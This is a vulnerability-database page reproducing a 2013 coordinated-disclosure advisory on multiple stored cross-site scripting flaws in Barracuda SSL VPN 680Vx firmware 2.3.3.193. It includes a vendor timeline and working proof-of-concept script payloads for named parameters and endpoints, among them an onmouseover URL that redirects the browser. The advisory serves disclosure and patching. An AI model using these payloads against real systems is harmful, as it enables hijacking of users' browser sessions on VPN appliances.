Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Barracuda SSL VPN 680Vx 2.3.3.193 Cross Site Scripting

🗓️ 01 Jul 2013 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities in Parsing User Inpu

Code
`  
Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities  
  
  
Vendor: Barracuda Networks, Inc.  
Product web page: https://www.barracuda.com  
Affected version: 2.3.3.193, Model: V680  
  
Summary: The Barracuda SSL VPN is a powerful plug-and-play appliance  
purpose-built to provide remote users with secure access to internal  
network resources.  
  
Desc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities  
when parsing user input to several parameters via POST method. Attackers  
can exploit these weaknesses to execute arbitrary HTML and script code in  
a user's browser session.  
  
Tested on: Linux 2.4.x, Jetty Web Server  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Vendor status:  
  
[05.03.2013] Vulnerabilities discovered.  
[16.03.2013] Contact with the vendor.  
[17.03.2013] Vendor replies.  
[19.03.2013] Working with the vendor.  
[28.03.2013] Vendor confirms issues, track BNSEC-1239.  
[15.04.2013] Asked vendor for status update.  
[17.04.2013] Vendor replies.  
[18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193)  
[07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues.  
[08.05.2013] Coordinating with the vendor.  
[08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved.  
[01.07.2013] Coordinated public security advisory released.  
  
  
  
Advisory ID: ZSL-2013-5147  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php  
  
Barracuda Labs: http://barracudalabs.com/?page_id=3456  
http://barracudalabs.com/?page_id=3458  
  
  
05.03.2013  
  
--  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/showSystemConfiguration.do?categoryId=821  
  
CRLs ADD: "><script>alert(1);</script>  
  
Parameter: propertyItem[25].value  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/showAuditReports.do (Reports)  
  
Username ADD: "><script>alert(1);</script>  
  
Parameters: user  
account  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/showSystemConfiguration.do?categoryId=14800  
  
Files to Scan ADD: "><script>alert(1);</script>  
Files to Exclude from Scanning ADD: "><script>alert(2);</script>  
Files to Block ADD: "><script>alert(3);</script>  
  
Parameters: propertyItem[1].value  
propertyItem[2].value  
propertyItem[3].value  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/showSystemConfiguration.do?categoryId=810  
  
Public Internal Web Sites ADD: "><script>alert(1);</script>  
VPN Port ADD: "><script>alert(2);</script>  
  
Parameters: propertyItem[1].value  
propertyItem[8].value  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/showAvailableAccounts.do  
  
Available Groups ADD: "><script>alert(1);</script>  
  
Parameter: selectedRoles  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit  
  
Account ADD: "><script>alert(1);</script>  
Group ADD: "><script>alert(2);</script>  
Policy ADD: "><script>alert(3);</script>  
  
Parameter: policy  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/editAccount.do?actionTarget=edit&username=guest&parent_name=edit  
  
Available Groups ADD: "><script>alert(1);</script>  
Authorized IP Addresses ADD: "><script>alert(2);</script>  
Other Computers (Waks-On-LAN) ADD: "><script>alert(3);</script>  
  
Parameters: selectedRoles  
propertyItem[1].value  
propertyItem[6].value  
  
====================================================================================  
  
  
https://sslvpn.ptest.cudasvc.com/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit  
https://sslvpn.ptest.cudasvc.com/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit  
  
Group ADD: "><script>alert(1);</script>  
  
Parameter: resourceName  
  
====================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2013 00:00Current
0.1Low risk
Vulners AI Score0.1
barracuda networks inc 680vxscript injection vulnerabilitiesuser input parsing
18